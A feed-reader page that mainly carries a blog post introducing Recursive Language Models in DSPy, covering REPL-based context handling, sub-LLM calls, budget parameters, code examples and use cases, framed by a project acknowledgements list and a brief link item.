We thank Chulong Chen, Mingxing Tan, Tom Walters, Harish Chandran, David Wong, Jieying Chen, Smitha Shyam, Vincent Vanhoucke and Drago Anguelov for their support in defining the vision for this project, and for their strong leadership and guidance throughout.

We would like to additionally thank Jon Pedersen, Michael Dreibelbis, Larry Lansing, Sasho Gabrovski, Alan Kimball, Dave Richardson, Evan Birenbaum, Harrison McKenzie Chapter and Pratyush Chakraborty, Khoa Vo, Todd Hester, Yuliang Zou, Artur Filipowicz, Sophie Wang and Linn Bieske for their invaluable partnership in facilitating and enabling this project.

We thank our partners from Google DeepMind: Jack Parker-Holder, Shlomi Fruchter, Philip Ball, Ruiqi Gao, Songyou Peng, Ben Poole, Fei Xia, Allan Zhou, Sean Kirmani, Christos Kaplanis, Matt McGill, Tim Salimans, Ruben Villegas, Xinchen Yan, Emma Wang, Woohyun Han, Shan Han, Rundi Wu, Shuang Li, Philipp Henzler, Yulia Rubanova, and Thomas Kipf for helpful discussions and for sharing invaluable insights for this project.

Read the whole story
bernhardbock
37 days ago
reply
Share this story
Delete

RLMs in DSPy

1 Share

Recursive Language Models are a new strategy for dealing with long context problems. We've implemented them in DSPy so you can quickly and easily try them with your existing DSPy programs or with new tasks.

Many of us are familiar with the perils of context rot. As our contexts grow, LLM performance drops significantly for many types of tasks. For agentic and exploration tasks this is particularly problematic, as our context grows the longer the agent works.

Recursive Language Models, a new strategy developed by Alex Zhang and Omar Khattab, addresses the context rot problem by providing LLMs with a separate environment to store information (in this case, a Python instance), from which the LLM can dynamically load context into the token space as needed. This environment is persisted and shared among subagents, allowing the LLM to ask questions about and explore the information without loading it into its main context.

This simple harness - a shared environment where LLMs can recursively interact with input context as variables - proves to be incredibly effective when dealing with very large inputs. We've used RLMs to summarize hundreds of megabytes of logs, perform coding tasks across massive multi-project codebases, and source evidence across a large collection of books.

We have implemented the RLM pattern in DSPy, allowing you to quickly and easily try RLMs with your existing DSPy programs or with new tasks. Today we're going to walk through how RLMs work, to establish a mental model for when and how might want to apply them, then get you up and running with an example in DSPy.

RLMs Manage Two Buckets of Context

RLMs work by providing an LLM with a REPL-like interface (think: a Jupyter Notebook), where they can explore, analyze, and load information by writing Python code. There is the variable space (the information stored in the REPL) and the token space (the context extracted from the variable space).

In a normal coding agent, you might provide the following context:

Your inputs are the following: Context: {LONG_context}, Other Inputs: {LONG_other_inputs}

If your inputs are sufficiently long, you could already be triggering context rot. Or, if your context is really long, you might not even fit in the model's context window.

With an RLM, on the other hand, the following context is provided:

Your inputs are the following: Context, Other Inputs.

You can access them inside your repl as variables. The variables are `context` and `other_inputs` respectively.

Previews:
context: {context[:100]}
other_inputs: {other_inputs[:100]}

Then we would prompt the LLM to write code in whatever language you have implemented the REPL in, which for both Alex's and DSPy's implementations is Python.

Then you run the code, append the output to history, and repeat.

Recursively Prompting LLMs in the REPL

The "Recursion" in "RLM" describes the LLM's ability to prompt itself, which we allow it to do in the REPL. This ability is exposed as a function.

In the case of dspy.RLM, we implement a single sub_llm() call. The main LLM can prepare a prompt and task a sub LLM with working on some information in the variable space. The results are returned in the variable space, as with any other function in a REPL, which the LLM can choose or choose not to tokenize.

Part of the beauty of this is that how the LLM splits up the work is undefined. Given a list of 10 long documents, the LLM could choose to split the work into 10 subcalls, or combine the work and parse the outputs, chunk sequentially, etc.

This kinda sounds like Claude Code, or the way most coding agents work. They fire off subagents to do work, then return the output to the main context. It's similar, but there's a crucial difference: Claude Code, out of the box, doesn't save outputs to a variable space that it can manipulate. For example, a Claude Code subagent returns a blob of text back into the context by default.

If Claude Code were to adopt a pattern where subagents write their results to files, we could consider this an RLM pattern.

And this turns out to be the difference maker. By providing the LLMs with a shared space to explore and store information outside the token space, RLMs unlock some incredible capabilities. Context rot is mitigated and tasks that can't fit into a single context window are suddenly addressable.

DSPy is the Easiest Way to Try RLMs

By extending DSPy with the RLM based paradigm, we are able to increase the capabilities and enforce some structure onto the RLM call.

For example, dspy.RLM gets to take advantage of the structure of the provided Signature. If your inputs include typed parameters or arbitrary data structures, that information is immediately provided to the RLM. When passing only strings, we find RLMs will spend the first few iterations just exploring the shape of the information. Signatures help us avoid this step.

Perhaps the best feature of dspy.RLM is that it works with all your existing Signatures. No need to tweak them, redesign your parameters, or issue special instructions. dspy.RLM is simply a new inference time strategy (just like Predict or ChainOfThought) that we can modularly swap in or out.

The only detail to note is RLMs require LLMs with strong reasoning and coding capabilities. The RLM strategy leverages the coding skills of larger models to solve long context problems - that's the unlock. GPT-5 and Opus versions work great with RLMs, though we continue to be surprised at how effective Kimi K2 is as well, despite its low cost and speed.

An Example RLM with DSPy

Creating an RLM with DSPy is easy:

signature = "logs, question -> answer"
rlm = dspy.RLM(signature)
result = rlm(
    logs = all_my_logs
    question = "Did anyone ask my agent about ice cream this week?"
)

The only line above that's specific to RLMs is dspy.RLM, which is the Module we use instead of Predict, ChainOfThought, or ReAct.

When you call a program using the RLM module, DSPy creates and manages a local, isolated Python sandbox using Deno.

You can install Deno with: curl -fsSL <a href="https://deno.land/install.sh" rel="nofollow">https://deno.land/install.sh</a> | sh. See the Deno Installation Docs for more details.

Your inputs are loaded into this environment as variables and the LLM is given a prompt DSPy prepares.

In our example above, we're using a string signature, but dspy.RLM works perfectly well with class-based signatures:

class CodebaseSubset(dspy.Signature):
    """
    Find all of the files from the provided codebase that would be helpful for understanding the given feature.
    """
    code_tree: dict = dspy.InputField()
    feature: str = dspy.InputField()
    relevant_filepaths: List[str] = dspy.OutputField

codebase_subsetter = dspy.RLM(CodebaseUnderstanding)

What's important to note here is that all the input variables - in this case code_tree and feature - are treated the same way.

If you've read about RLM and/or tried Alex's library, you may be used to the pattern where an RLM is set up with one very long context resource (loaded into the REPL, of course), that is then used to answer a given query. It's helpful to realize that we don't need to follow this pattern - one big context and one question - with dspy.RLM. Every input can be large or small, it doesn't matter: they're all loaded into the REPL.

And as usual, DSPy helpfully provides your typed outputs in the response object. No need to worry about data extraction:

result = codebase_subsetter(
    code_tree = dspy_repo,
    feature = "RLM"
)
rlm_relevant_files = result.relevant_filepaths

We can also pass in Python functions as tools the LLM can call within the REPL:

def web_search(search_term):
    # Web search stuff

def github_search(search_term):
    # Gh search stuff

codebase_subsetter = dspy.RLM(
    CodebaseUnderstanding,
    tools = [web_search, github_search]
)

For harder problems, RLMs can run for quite awhile. There's a few things we can do to keep a leash on the AI and keep our wallet intact.

First, we can adjust the budget we give the RLM. We have two levers here:

  1. max_iterations: This specifies how many turns (comprised of reasoning and a REPL call) our RLM is given to complete the task. By default this is set to 10, but for many tasks 5 works well. Check your logs (or pass in verbose=true) and try a few runs to get a feel.
  2. max_llm_calls: This parameter defines how many sub-LLM calls the main RLM can fire off from the REPL. The reason this figure is separate from the parameter above is because the RLM can fire off many LLM calls from the same REPL turn.

Let me give you an example of max_llm_calls in practice:

In one task, after a couple iterations, the model has developed and tested a prompt that performed well when given a subset of the very large context. The main LLM did some quick math and realized the remaining 20 LLM calls it had budgeted was more than enough to process the entire large context, in 20 separate chunks. So it did.

The final lever we have to rein in costs is the ability to specify a different LLM as the sub_lm. For example:

codebase_subsetter = dspy.RLM(
    CodebaseUnderstanding,
    tools = [web_search, github_search],
    max_iterations = 5,
    max_llm_calls = 20,
    sub_lm = gpt_5_mini
)

Just set up the LLM as you would any other DSPy LLM.

Optimize Your RLM

dspy.RLM can be optimized like any other DSPy program. Behind the scenes, it's handled similarly to dspy.ReAct: tool descriptions and signature instructions are compiled together into an instruction block that is then optimized with GEPA, MiPRO, or whatever.

The way dspy.RLM works with signatures and optimizers is consistent and modular. Existing programs run with RLMs just by switching out the module. This is the killer feature of DSPy: when there's a new optimizer or test-time strategy, your existing signatures should just work. Applied AI moves fast; the tasks you define shouldn't have to change.

Use Cases for RLMs

The main use case for an RLM is tasks that require reasoning across long contexts. Below are five problem shapes where RLMs shine - each involves some combination of long input, fuzzy structure, and multi-step reasoning that would be painful to decompose by hand.

Given a large set of documents, an RLM can search through to find the documents that fit a given criteria. Downstream applications include:

  • Fuzzily filtering data or logs from a certain app or service
  • Finding outlier reviews in a large dataset
  • Scanning for incorrect traces from an LLM service
  1. Long context summarization/QA

An easy target use case for this is codebase QA. If you need to find all relevant files for a given feature, an RLM can do the grep et al styles of operations along with some things that are harder in bash such as AST parsing.

One of the primary benchmarks used by Alex is Browsecomp. Browsecomp is a multi-hop reasoning benchmark, requiring you to find a fact inside a corpus, then to chain multiple facts together from across the corpus in order to answer the ultimate claim.

Most complex QA tasks involve some kind of multi-hop reasoning, and we are encouraged by the improvements that RLMs can help offer in this area.

  1. Clustering and categorization

Given a long list of items, an RLM can investigate those items and come up with clusters based on what it sees. We see this as being especially useful in analyzing data from users - it could be reviews, traces, conversation intent, etc.

  1. Dynamic symbolic manipulation of long fuzzy contexts

It may be the case that you need to do some emergent decomposition based on fuzzy properties of the data. Let's say that in each document, you know that the date is referenced somewhere but you don't know where. It is very feasible to have an RLM investigate all the possible cases, and come up with a number of formats to extract, or even to use a sub_llm to extract the date from the file.

Read the whole story
bernhardbock
40 days ago
reply
Share this story
Delete

Isometric NYC

1 Share
Read the whole story
bernhardbock
54 days ago
reply
Share this story
Delete
Next Page of Stories